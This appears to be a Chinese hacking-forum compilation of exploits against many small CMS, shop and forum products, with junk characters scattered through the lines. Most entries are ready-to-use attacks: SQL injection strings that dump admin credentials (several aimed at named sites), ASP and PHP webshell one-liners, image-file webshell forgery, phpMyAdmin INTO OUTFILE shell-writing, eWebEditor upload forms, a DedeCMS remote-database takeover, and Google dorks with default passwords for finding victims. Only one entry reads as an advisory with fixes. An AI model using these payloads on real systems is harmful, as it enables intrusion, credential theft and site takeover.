启航企业建站系统 cookie注入漏洞通杀所有版本8 ]" @: X2 Q5 f
6 u$ A/ B6 J: f2 F( E直接上exploit:
3 I! Y9 a: R: w3 djavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));2 q! `% Z- ^% |& S3 W3 a. p
test:http://www.tb11.net/system/xitong/shownews.asp?id=210! P4 W5 v% O; C% ^( T7 p* _7 S
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( @9 @+ T0 T% ^ }/ q7 U! f% ?, X
Asprain论坛 注册用户 上传图片就可拿到webshell* y' ]' p8 \. _5 P2 M l* N
, a6 f: j1 H3 J+ z' \
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
. ?5 x( Q, ]/ M2 }: @' `1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
0 b9 |, B9 g8 F% ~+ U: K# Q2.gif 为一小图片文件,一定要小,比如qq表情图片, t6 y4 _/ {7 P4 v% e# }
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
4 ?( P# {7 f3 Y# \ B. e5 t4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
/ a0 w% B5 D7 ?+ M( g* Y# I5.q.asp;.gif' o0 g: @8 f- ^ `* B6 b3 D9 W
google:Powered by Asprain
3 c) i. `: E* ^--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" X! T3 D( o$ G- ?' b
' ~8 k& x8 M0 a+ g/ t& w; C
ShopNum1全部系统存在上传漏洞。4 _0 }8 _% T f7 j# Y3 r6 V
R+ Q7 r, _' \3 J% i8 Q R首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
- o3 R* o0 i1 m1 [9 V按说明 提示登录后台。。
+ c9 I3 u" y( @0 o; d2 L- m8 K在后台功能页面->附件管理->附件列表
9 S- { q7 y W, j# o* _6 X4 z, h可以直接上传.aspx 后缀木马) l! O; e' | d1 |
http://demo.shopnum1.com/upload/20110720083822500.aspx: O4 n8 n2 C9 ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ K. ~9 n* m9 v$ i
: t# f& k9 A! ]0 O6 J9 O牛牛CMS中小企业网站管理系统 上传漏洞7 A, q( J' o/ X; P, W$ m
# `& Y/ T! r# P8 S1 q; B& ~4 b: B' T牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。: s# Q @' w- a F8 x9 J! h) c
后台:admin/login.asp
0 a; Z& h. d* ?3 Y% W0 o C( O& P. Fewebeditor 5.5 Nday
4 e6 e+ V+ P* P# gexp:
. R. W* q8 D* u2 E9 W<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?! c- h& n- u' q
<input?type=file?name=uploadfile?size=100><br><br>?* I$ W, y0 S" V0 X3 G
<input?type=submit?value=upload>?' C5 \9 Y8 s I# c, X& d2 w) Y
</form>4 D: `9 I# v4 i0 o
ps:先上传小马.7 f1 e4 o, ~* F' |( S( z4 d# {
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
( S* V- t6 q" d! F# Q) f6 a' [4 s/ {! W- ]3 A
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 Q4 A' p+ z+ V% W5 I5 U% i' D
4 J. }1 g9 r x3 ^3 w/ y7 c0 ^8 r
YothCMS 遍历目录漏洞3 ^! v% M' Y0 n3 e0 I6 V% R1 c
8 |/ g6 N0 r1 j/ i6 }& B: {优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。) K. J! y; s1 ^8 l# T; R4 g2 x
默认后台:admin/login.asp5 i" [7 k+ b( s# t
遍历目录:
9 l' i$ `+ ^. d" B0 Z% dewebeditor/manage/upload.asp?id=1&dir=../& ?0 w$ S: ^7 e: _
data:
* P& V2 v& _" A; F8 s; w& Lhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa5 @* E+ l7 _6 a& p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" I; _: u* I) X9 K/ e; i l1 i
: l9 g3 N% d Q8 x) A) C" jNet112企业建站系统 1.09 _7 w1 V" i0 p8 W [. U5 t
* o1 h6 F& C' j4 d, K
源码简介:, I6 A2 K1 a7 `3 k& I
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。+ {# G* A* ]1 Y8 [# e0 N! I
添加管理员:
, a$ h, P) V8 L! Ohttp://www.0855.tv/admin/admin.asp?action=add&level=24 g5 q! T N! a7 b) S& ~6 m% I% ]. v
其实加不加都不是很重要,后台文件都没怎么作验证。
: w; q3 n. n, ?! `& D: b上传路径:6 q3 N( F) a0 W
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
: T$ X( b( W2 M0 P/ Dhttp://www.0855.tv/inc/Upfile.asp?Stype=2
; m2 \: w6 I3 n8 O怎么利用自己研究。5 X8 w3 a L9 Z8 I$ W
遍历目录:, Y* A+ M* W8 n, M% f- _4 ], y
http://www.0855.tv/admin/upfile.asp?path=../..- H* \# ]5 Y8 l* T4 ]6 X) C* E& A
如:
, n _% ^- A9 b* u# @3 lhttp://www.0855.tv/admin/upfile.asp?path=../admin% }0 q, j% m ~9 d% c9 c2 o
http://www.0855.tv/admin/upfile.asp?path=../data6 ]/ m6 i! |9 I7 g: g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 b( Q! U) s6 w4 F' \" h& R
+ f$ j1 J5 K+ [4 M易和阳光购物商城通杀 上传漏洞
" E8 u* ~/ g( d4 T6 n- d6 ^7 A
" @1 t4 f/ K1 ~前提要求是IIS6.0+asp坏境。4 n9 I6 p: B$ S3 H
漏洞文件Iheeo_upfile.asp # K1 [) M P2 u. q" ~* n( y* Y
过滤不严.直接可以iis6.0上传% c* \3 U2 j3 k6 { Q
把ASP木马改成0855.asp;1.gif: G) V9 z: i3 m$ L" V- C9 ]9 N0 Q
直接放到明小子上传
% f# X+ `; I+ }, I# EGoogle搜索:inurl:product.asp?Iheeoid=
0 w* G. v5 s3 x% k7 X/ ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" z0 z! j7 X2 m' i1 k. t+ q0 H/ W- \3 S8 W& R9 q2 v& L* T7 z6 T
phpmyadmin后台4种拿shell方法, K0 Q! w) h& Q6 C. X) S4 I5 L
! [! E$ M/ A0 t% s8 M6 ~! W9 C; L方法一:
, B% c* e4 a& |# T' tCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );# X, f2 _) V. U# q/ b
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');8 K K; e6 s% |( a1 d: H# t. Y
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
& n; |" C% r9 E) d----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
; r0 O) ~5 K) Y" Q一句话连接密码:xiaoma
% `( ~7 n! a: A方法二:
: z' r' ?9 @# z$ t3 q4 L1 zCreate TABLE xiaoma (xiaoma1 text NOT NULL);
. v5 V z4 i9 _% F4 \& ]9 lInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');0 b% d0 g' T, R" O4 k+ W, x
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';3 c( e1 B1 `& f* \7 A5 O7 T
Drop TABLE IF EXISTS xiaoma;
; s+ F3 [$ u3 ]" A: r0 I方法三: u; o( u. S, F+ [" X, k
读取文件内容: select load_file('E:/xamp/www/s.php');! n. t8 L* z) E4 K/ M0 H! L: K% v
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'1 V; G% a. T. X& f) h& K! ?
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'8 R$ \9 B: M! |( W
方法四:/ R6 e( u/ S$ { c4 [. V- K5 o2 k- y
select load_file('E:/xamp/www/xiaoma.php');: s' x8 ]6 ]6 {% O
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'9 J, d$ ~* C& j. `
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir2 ?) J1 d% d" {2 Y: g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ B* J3 e( V: d* i/ C$ y$ A4 b* l+ s( Y$ L2 g
传信网络独立开发网站源码0day漏洞5 \0 r) V; ^4 M
9 f3 c( y3 p2 _( e" t. _
后台system/login.asp
& d; C8 F( [" Z进了后台有个ewebeditor
9 M/ p' y9 X3 a. k6 tGoogle 搜索inurl:product1.asp?tyc=
& R, {2 I D3 K* F A编辑器漏洞默认后台ubbcode/admin_login.asp7 ]( a. e4 D' `. Q8 M5 \
数据库ubbcode/db/ewebeditor.mdb! d. s; s$ m1 U1 G8 }( \6 h7 |4 h, e
默认账号密码yzm 111111- ]# m8 z+ z. }/ H% J+ d
$ c+ d% ~% @1 \6 F" ~
拿webshell方法. S/ W: a2 R- a. F
登陆后台点击“样式管理”-选择新增样式
% \; F5 |( O1 n1 j, X" q( c样式名称:scriptkiddies 随便写
: ?% @6 ]4 p& ~4 T. q' a4 d' ~, t路径模式:选择绝对路径 & Q! w! W O( z' E6 }/ r
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
, c3 K) J q+ z% v5 O图片类型比如就是我们要上传的ASP木马格式
4 G1 x$ o" s+ F1 I4 z5 A& x/ p9 C上传路径:/
5 D d9 L* W) C1 e- t; d图片限制:写上1000 免的上不了我们的asp木马
1 G8 @' Q9 f/ m3 S上传内容不要写
' F9 i G( U8 C. V. T# b8 ]/ d/ b可以提交了
9 s/ j: U: n2 `$ ?: {' j样式增加成功!
- v9 f& m+ b& m返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 - e+ E2 l. J& s
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置7 n0 k2 |" R* H
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
T5 X! |! ^/ d" B! x; k上ASP木马 回车 等到路径
6 g3 i; `- t' M: b" d5 S# j8 S. E* b. Y- c3 S* H) r1 Y' n
后台:system/login.asp
E) Z, O5 X9 ]Exp:, @: h% W5 k: x' Z0 M& h
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
+ y) _& g. y1 V- U测试:! n* C3 _8 Q& r& \5 s& A& q3 K
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
* Z! m* y0 ^+ X f, m' ?0 a& L' {+ @9 qhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master1 ^3 ]3 E9 Y$ N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 W: ^( I$ i! y& q$ N2 _
1 Y3 z' `- M: t: Z+ U+ S! K3 q6 u) G
foosun 0day 最新注入漏洞
" I0 f5 M+ l0 Q1 v, w) O
% @! J% N2 O/ K1 v! w; e漏洞文件:www.xxx.com/user/SetNextOptions.asp# T: N F: q4 P
利用简单的方法:: }3 T1 M* f( }6 D& B- h* ^5 ?" v
暴管理员帐号:. L4 F% x/ F8 G) X0 j. q' t
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
6 m% G6 b b: O; C暴管理员密码:) t! g3 |7 t7 A. z
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
8 L2 _ C/ S9 s p8 _& n$ j5 v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 ~# [ {( U7 u" r+ b* P4 W7 j
4 N5 b) F" s& q; Y. z4 `$ m
网站程序的版权未知!1 j1 `+ Q V5 r( b5 M% ?& P+ m4 U0 d9 s
. }2 b" Q. S7 C' ]7 W6 U6 S
默认网站数据库:: a E$ D2 D$ r9 l; h: j/ b
www.i0day.com/data/nxnews.mdb
- w: A- m, E9 Cewebeditor 在线编辑器:
+ k3 N2 p) I8 e9 G4 r编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb, |/ E% ]4 g- W& U
登录地址:ewebeditor/admin_login.asp
; N2 E/ s) ?3 |) W8 p4 w& y0 z默认密码:admin admin
2 [: L1 O4 r+ j8 c3 ?登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data3 D9 n2 o" ^5 ?% ^: e+ e0 i3 s% F( L
' w4 B% z! s1 l& J. d# v9 b
Sql注入漏洞:
! O( [0 n) Y6 O! G( g% Xhttp://www.i0day.com/detail.asp?id=12
) y. m# T- _. j' N! W8 Eexp:7 P' T( u' D0 c$ L* y6 z+ b
union select 1,admin,password,4,5,6,7,8 from admin
$ @5 X% w3 [* p3 ^) S2 U3 `8 k爆出明文帐号/密码; E7 K' u6 C6 j$ l, R# [; p
' ^! ]% b" d* o上传漏洞:9 H& J* Y. k, w/ n! j" j8 I$ h) c# G
后台+upfile.asp: ~/ q; Z) h: p: X6 }
如:, u/ i5 o$ i1 f, k( c, {. O
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。* b& P! `9 X- D7 T5 M0 q, ]
shell的地址:网址+后台+成功上传的马
3 _7 y3 C( {% E+ cgoogle:inurl:news.asp?lanmuName=8 c" e+ G. `3 _8 k0 L$ ?! A
------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 E. c1 ~5 T4 [4 N: p1 X
/ S' g& k( ?% p! Z
dedecms最新0day利用不进后台直接拿WEBSHELL
+ r5 e) i3 m3 O2 s7 P
, a2 e9 n; h: H拿webshell的方法如下:1 C! H) p: V& R/ L/ P; U
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
3 C+ ^4 l# W+ U8 k# d9 H b前题条件,必须准备好自己的dede数据库,然后插入数据:# q4 u3 x3 G8 m$ k1 H6 w
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
" a( i, g; V- U: N+ P/ E4 v5 M# [8 m- h. w- o
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
: @% V! o3 H4 K1 t. J<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">' b- ]$ N. k `" H( i7 m
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />) |+ v; v4 r! U' q' u) k! V
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
' O3 a* I9 T( L: _; ?. i3 v$ Y# L<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />. `1 i9 E; @5 G0 k" w' o0 H" V
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />) D8 q( A% J: y3 m( ~
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
5 u7 Z5 K0 z' p. j1 J<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( E% t8 F$ f$ ^2 Q) b- ~
<input type="text" value="true" name="nocache" style="width:400">
4 S9 O9 m7 m6 Z- \5 q% o [<input type="submit" value="提交" name="QuickSearchBtn"><br />
5 g4 X4 Z: d1 z1 [* `" b1 f</form>
. a$ N4 ~& h. V, `' b5 |+ }<script>
) f8 t" O6 D+ L2 D9 Wfunction addaction()
/ O# D3 h) b: J& ~) A. @( Q{
- ~& T% x( [$ z7 p) ?document.QuickSearch.action=document.QuickSearch.doaction.value;$ W& }# h& F4 p1 W8 y
}9 F& z5 J- [, F/ h1 T
</script>
: Q1 H6 e& O% u* U-----------------------------------------------------------------------------------------------------------------------------------------------
% ^$ Z6 q0 X- z& b$ Y% v6 i4 D4 \$ \! I9 m) L+ k, i+ h
dedecms织梦暴最新严重0day漏洞0 O# m2 S9 h. P* z$ M1 y4 w
bug被利用步骤如下:, h0 n2 l- h2 c; Y# [
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
7 J- y% U5 T9 M7 }: @$ V把上面{}上的字母改为当前的验证码,即可直接进入网站后台。0 D# i# Y p8 z2 t/ D
-------------------------------------------------------------------------------------------------------------------------------------------0 O4 }7 S0 J, z5 n1 l+ J; e
1 m$ X8 v: ^9 o) @; q
多多淘宝客程序上传漏洞 & M8 z' ^- b2 y- o9 k1 S6 D
漏洞页面:% d3 X* {$ h2 D0 e2 M" E* f
admin\upload_pic.php
, b* O- u( k8 C$ z5 M$ `传送门:* A2 v; \; Q) X! O
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
" g9 g2 g4 B5 s* UPS:copy张图片马 直接 xxx.php 上传抓包地址!
! P9 q9 e4 |3 \% B------------------------------------------------------------------------------------------------------------------------------------------------------& _/ L8 ], Z9 j
* C: y) z0 g8 X+ m无忧公司系统ASP专业版后台上传漏洞
. \7 h" }- `# E( N2 P: g; P+ e: Z漏洞文件 后台上传 W2 o" ?9 }; h
admin/uploadPic.asp3 ?* D# p( H; b8 O7 Q2 ]
漏洞利用 这个漏洞好像是雷池的
( l* R2 ~& X6 ]$ C; j# q thttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=13 y) ~+ D% h7 U- T+ Q+ C
等到的webshell路径:
* m1 Z+ f% c$ q& q! A! B! S" _1 e/UploadFiles/scriptkiddies.asp;_2.gif5 Y o9 c* B) Y
---------------------------------------------------------------------------------------------------------------------------------------------------6 L% a7 w* k; @. t- h
+ e' v' X+ ~. W: |, J住哪酒店分销联盟系统2010+ k9 c+ r' q( Z% @+ ^6 h! H( U5 V
Search:! L9 A( e; d% V" R
inurl:index.php?m=hotelinfo
. v3 _4 g/ C7 _http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
( c0 n# X! L. h- L r3 S; u3 h默认后台:index.php?m=admin/login
2 ?2 k b, e1 b3 U2 B7 ]--------------------------------------------------------------------------------------------------------------------------------------------------
" q% @( U$ v8 l e
9 X& E* P% x* |# ? q5 vinurl:info_Print.asp?ArticleID=5 i* C+ Z$ G. I- l
后台 ad_login.asp
8 f" ~# c, e. Q1 a& _9 q$ x爆管理员密码:% c0 _! C* m' H4 Z, z
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin$ k2 B1 b1 }9 {& x: s
------------------------------------------------------------------------------------------------------------------------------------------------------------
r& R( D) g! ~- Z- w# R
3 ^* `) i5 I8 f. S, X% Z搜索框漏洞!
4 s0 n1 X/ p, E) `: v4 ~%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='- s( P" l/ h% g8 x. \' n+ X
--------------------------------------------------------------------------------------------------------------------------------------------------------
1 G' |; i$ w: _. J4 ?3 Z; r' ^9 J: H& f7 l) _5 S
关键字:6 n( [( H1 S. W; M3 k
inurl:/reg_TemletSel.asp?step=2* A3 X6 y9 U# `* Q* ^* B
或者
j( g9 k# e! O, Y电子商务自助建站--您理想的助手
# }1 K) h7 u4 c2 y) H" Z: q-------------------------------------------------------------------------------------------------------------------------------------------------( J4 `8 F: f+ Y8 i- }& n$ [
: V% C5 q' {' g$ E4 }+ @; s: ZiGiveTest 2.1.0注入漏洞5 t; e z7 x. e: J* _9 Z) K
Version: <= 2.1.0
$ s& e1 M. \: A6 [# Homepage: http://iGiveTest.com/8 `5 b: J8 s, o( D C) u2 C' N7 ~4 z
谷歌关键字: “Powered by iGiveTest”
" a# G. s" X" ~- D随便注册一个帐号。然后暴管理员帐号和密码 _) w+ S. @8 t9 a5 L% h* U
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1$ j: {# b' M5 o' ?& z6 N
------------------------------------------------------------------------------------------------------------------------------------------------
2 D) q! J/ L- L; A2 q- z; T* m5 a6 J+ [
CKXP网上书店注入漏洞" H1 q4 w3 B- D! J, G. X# L/ ^& w
工具加表:shop_admin 加字段:admin
+ e* e, H" o8 F5 X后台:admin/login.asp 9 h" f. c8 a& |% |4 T
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/ B# ?9 S0 u C7 ~, \
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息7 Y+ @9 w% w: L) ?) W- p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 K* u6 B' N5 y: ]' M: Y. e
0 _; |& s4 V3 r4 E8 X
段富超个人网站系统留言本写马漏洞
9 j" P. D) N5 ?源码下载:http://www.mycodes.net/24/2149.htm
1 J9 ~7 ?3 G8 T/ baddgbook.asp 提交一句话。, H8 u" k! O! R% P
连接: http://www.xxxx.tv/date/date3f.asp- I: d; g/ e$ }8 F, |# x1 ?! I, ~- S
google:为防批量,特略!8 {7 r4 ^" [; \$ v! ]" a
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- G( k0 {* G4 }; P
& R0 b& j8 {9 k4 D4 L$ O
智有道专业旅游系统v1.0 注入及列目录漏洞7 z6 A, N% v$ }/ j/ D
默认后台路径:/admin/login.asp- C0 d4 ~0 y0 d% S$ J
默认管理员:admin5 A* ?+ n. z* b1 z" E. A$ W
默认密码:123456+ }& b) ?; F7 b: j! s7 M3 g
SQL EXP Tset:
1 a" G- j" L U# Uhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
- A' j6 |5 ^1 l4 x7 ?------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 Q4 r9 w4 M/ z# W5 E$ }2 g
2 k5 _2 g k7 A& Y. [9 T) Gewebeditor(PHP) Ver 3.8 本任意文件上传0day7 { w; ?5 X2 r: j& s& c
EXP:- i- {5 l- U& [3 \* B8 E
<title>eWebeditoR3.8 for php任意文件上EXP</title>
& U9 O* u' u3 v* J! o; b# g9 Y<form action="" method=post enctype="multip
1 t6 f) o6 q1 j* ^; l- mart/form-data"> * `4 W- P2 P/ t+ K( w0 h
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
. D4 h, V, I% c; G; H5 @% @URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> , |/ p6 {. }$ P. o
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
- b) `( F$ M0 g& Z7 L5 {$ vfile:<input type=file name="uploadfile"><br> . D9 V! p2 o' y/ |
<input type=button value=submit onclick=fsubmit()> 8 D* `4 N6 M- m/ {$ R j
</form><br>
6 g6 S; A; Y0 s6 D8 ?0 k<script> . B- `& q5 E4 ]/ u
function fsubmit(){ 9 g3 F# U' t' m+ f( v
form = document.forms[0]; 5 v T: H3 l' ]3 V R* s
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
& I- m/ I% D6 D" {( a" yalert(form.action); 7 n- P2 A5 Y# O
form.submit(); 7 P5 y% D( i1 ]4 a6 Y4 E: @
}
2 P0 B" o# n: R8 v; q$ V4 D" r</script>: n1 `( M, {5 s# F
注意修改里面ewebeditor的名称还有路径。3 C# F' G c5 o% k
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ e! b4 { E4 [4 M' D! J
. b* H2 N& [( }. O提交’时提示ip被记录 防注入系统的利用
) _: l& M$ z- Y/ j' K9 _) C: G: c网址:http://www.xxx.com/newslist.asp?id=122′
1 {% H+ k& r1 Q8 r提示“你的操作已被记录!”等信息。
* y$ z1 S6 K+ R+ z利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。, F" J/ [7 c7 A) |
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, ^5 `: s' w& {/ m6 e
2 V3 g2 M$ g" n( q% t6 {西部商务网站管理系统 批量拿shell-0day: b; a( M1 a' Y) ?' i/ Y' {! f" O/ f
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ; Y6 N8 z1 Y' l* E1 k4 A9 b
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛: n2 D6 X' M' {8 b+ e) _& N9 H3 A
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合/ g! w/ v$ p6 K8 q" ^$ N
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
% q) R" x: W8 A) S---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 S. r9 M: g5 X5 Y9 u9 e. s/ p+ v& v$ Z. ~, _) e
JspRun!6.0 论坛管理后台注入漏洞: V/ q5 c7 U0 G; ?" T
! B5 T6 E V, X
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
8 D* h" U1 m4 M9 U$ F8 Y( zJspRun!6.0 2 v9 B$ P- X# A
漏洞描述:! X7 ]/ W$ s- t
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
4 k) D) j1 O- q/ R/ U; y& F% b# L在处理后台提交的文件中ForumManageAction.java第1940行
) b+ B P3 `! _+ y* @; VString export = request.getParameter("export");//直接获取,没有安全过滤. F& m2 K! B2 u+ T
if(export!=null){
* }5 Y# U \: X$ j; J X1 ]/ zList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...8 G* F9 U( I+ v% W, I7 c( I* \
if(styles==null||styles.size()==0){
9 U; r# S0 T# q: }<*参考) U1 C& O c3 C) P$ ^- Z+ Z
nuanfan@gmail.com6 ]6 `) d/ h3 x% V
*> SEBUG安全建议:! Y, K9 T1 \6 G
www.jsprun.net
; l9 Y& e& o8 M$ u8 X6 ?5 O8 W(1)安全过滤变量export
% E; r9 x& Y9 H; k( U) x& j. v(2)在查询语句中使用占位符
8 }; x" p7 ]9 I1 F8 \6 |- G% p* b------------------------------------------------------------------------------------------------------------------------------------------------------------------------------( u8 }' Y- ]1 a: W: O9 R
* ?, J; a5 a) j* ?- T( U" w乌邦图企业网站系统 cookies 注入
" K |+ X1 J0 ?, T: r# B! @2 r) h( Y( f$ r" _
程序完整登陆后台:/admin/login.asp/ J+ B) r! ^2 F f( k- [
默认登陆帐号:admin 密码:admin8887 L$ c2 u9 j3 A- ]( {! E6 S
语句:(前面加个空格)" Y! |8 {- z, @' W4 Q8 d! W9 u
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
# f! x+ \+ H3 Y6 \/ u或者是16个字段:
# E- a# V7 L4 M* t. band 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
6 O. `: l" C$ F/ L爆不出来自己猜字段。
+ _# d. L# t/ L0 b9 P# w5 R注入点:http://www.untnt.com/shownews.asp?=88
5 [" x' Q$ ~, ~getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
6 i- k# A/ K: Z) D4 {# \3 [0 g关键字:9 o) p7 c I, o: @; U7 n# {
inurl:shownews?asp.id=
+ V, R; R b* a2 E-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------; Z/ q$ x8 _) B- x: j1 H6 q+ P
6 Q: A$ g6 }+ a- RCKXP网上书店注入漏洞. a+ }; ?, T \: u( T3 i( l
6 J* x3 E- b# N/ j2 R* n工具加表:shop_admin 加字段:admin* c3 Q- d& n' _7 B% @: l
后台:admin/login.asp
: A1 ~1 W. d, a; o# C! x) A# q登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
/ S! e% w/ C& B8 v9 {6 ^$ |7 T. sinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
1 _8 Q+ K7 K d0 M: j' Z2 @---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 H9 m. [; {- v& C( ?1 ?6 Z
